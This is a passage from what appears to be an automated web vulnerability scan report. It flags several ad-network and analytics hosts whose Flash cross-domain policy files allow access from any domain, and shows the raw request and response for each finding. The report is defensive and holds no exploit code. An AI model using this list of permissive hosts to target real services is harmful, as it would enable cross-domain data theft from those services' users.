Cache-Control: private, max-age=31536000
Age: 20954886
Expires: Wed, 04 Jan 2012 12:01:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*"/>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443"/>
...[SNIP]...

6.11. http://cdn.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Sun, 04 Sep 2011 00:55:27 GMT
Date: Sun, 04 Sep 2011 00:55:27 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.12. http://ce.lijit.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ce.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ce.lijit.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:58:09 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n15.panthercdn.com
ETag: "7955a-83-4aad025722640"
Cache-Control: max-age=604800
Expires: Fri, 09 Sep 2011 13:20:56 GMT
Age: 128233
Content-Length: 131
Content-Type: application/xml
Last-Modified: Thu, 18 Aug 2011 23:41:05 GMT
Connection: close

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.13. http://gannett.gcion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gannett.gcion.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

6.14. http://get.lingospot.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://get.lingospot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: get.lingospot.com

Response

HTTP/1.0 200 OK
Connection: close
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "-1221676599"
Last-Modified: Tue, 02 Dec 2008 06:03:41 GMT
Content-Length: 139
Date: Sun, 04 Sep 2011 01:08:26 GMT
Server: lingo

<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

6.15. http://gscounters.gigya.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gscounters.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Length: 341
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:2d6b"
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web204
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:52:28 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.16. http://i.casalemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: i.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:27:27 GMT
ETag: "15690dc-e6-1230c1c0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Sun, 04 Sep 2011 00:53:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:53:06 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.17. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 00:57:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 00:57:21 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.18. http://img-cdn.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img-cdn.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img-cdn.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Content-Type: text/x-cross-domain-policy
Date: Sun, 04 Sep 2011 00:55:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.19. http://img.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:49 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.20. http://imp.fetchback.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:33 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

6.21. http://init.lingospot.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://init.lingospot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: init.lingospot.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: max-age=7200
Content-Type: text/xml
Etag: "-5d35a762ba6b2244"
Last-Modified: Mon, 09 May 2011 16:03:41 GMT
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:54:31 GMT
Server: Google Frontend

<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

6.22. http://l.betrad.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.betrad.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=315360000, public
Content-Type: application/xml
Date: Sun, 04 Sep 2011 00:59:03 GMT
ETag: "4e4ed5c4=cf"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Last-Modified: Fri, 19 Aug 2011 21:29:40 GMT
Server: Cherokee
Content-Length: 207
Connection: Close

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-p
...[SNIP]...

6.23. http://m.xp1.ru4.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 04 Sep 2011 00:55:53 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:05 GMT
Content-length: 202
Etag: "ca-4ceae155"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.24. http://metrics.sprint.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.sprint.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:40 GMT
Server: Omniture DC/2.0.0
xserver: www372
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.25. http://nmsacramento.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmsacramento.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: nmsacramento.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:04:37 GMT
Server: Omniture DC/2.0.0
xserver: www411
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.26. http://pix04.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sun, 04 Sep 2011 00:49:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.27. http://pixel.mathtag.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x2 pid 0x6804 26628
Set-Cookie: ts=1315097793; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 00:56:33 GMT
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

6.28. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 01:00:45 GMT
Content-Type: text/xml
Content-Length: 207
Date: Sun, 04 Sep 2011 01:00:45 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.29. http://premium.mookie1.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://premium.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: premium.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 15:38:09 GMT
ETag: "d4820b-d0-48821fe531a40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

6.30. http://query.yahooapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://query.yahooapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: query.yahooapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Date: Sun, 04 Sep 2011 01:10:48 GMT
Server: YTS/1.19.8
Age: 1

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

6.31. http://r.casalemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:23:18 GMT
ETag: "1ad8fc9-e6-3595180"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Sun, 04 Sep 2011 00:56:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:56:38 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.32. http://r.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 00:47:36 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 00:47:36 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.33. http://rcv-srv48.inplay.tubemogul.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rcv-srv48.inplay.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: rcv-srv48.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=500&flashID=myExperience&bgcolor=%23F4F4F4&wmode=opaque&dynamicStreaming=true&videoSmoothing=true&playerID=1055201224001&publisherID=315980433&isVid=true&autoStart=false&isUI=true&allowScriptAccess=always&debuggerID=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1314384909000"
Last-Modified: Fri, 26 Aug 2011 18:55:09 GMT
host: rcv-srv48
Content-Type: application/xml
Content-Length: 204
Date: Sun, 04 Sep 2011 00:45:53 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.34. http://s.meebocdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.meebocdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.meebocdn.net

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 03 May 2011 00:23:33 GMT
ETag: "3934951678"
Server: lighttpd/1.4.19
Content-Type: text/xml
Cache-Control: max-age=163863
Expires: Mon, 05 Sep 2011 22:41:27 GMT
Date: Sun, 04 Sep 2011 01:10:24 GMT
Content-Length: 348
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" secure="False"/>
<allow-access-from domain="*.meebo.com" secure="False"/>
<allow-http-request-headers-from domain="*.meebo.com" headers="*"/>
<allow-access-from domain="*.meebocdn.net" secure="False"/>
...[SNIP]...

6.35. http://s0.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 03 Sep 2011 23:21:26 GMT
Expires: Fri, 02 Sep 2011 23:16:00 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 5440
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.36. http://secure-us.imrworldwide.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:58:35 GMT
Content-Type: text/xml
Content-Length: 268
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
Connection: close
Expires: Sun, 11 Sep 2011 00:58:35 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

6.37. https://socialize.gigya.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://socialize.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: socialize.gigya.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:0"
Server: Microsoft-IIS/7.5
X-Server: web517
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
Date: Sun, 04 Sep 2011 01:18:42 GMT
Connection: close
Content-Length: 341

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.38. http://statse.webtrendslive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:8a2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:58:31 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.39. http://sync.adap.tv/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sync.adap.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.adap.tv

Response

HTTP/1.0 200 OK
Content-Type: application/xml
Connection: close
Content-Length: 204

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic
...[SNIP]...

6.40. http://sync.mathtag.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x1 pid 0x24ad 9389
Set-Cookie: ts=1315097753; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 00:55:53 GMT
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

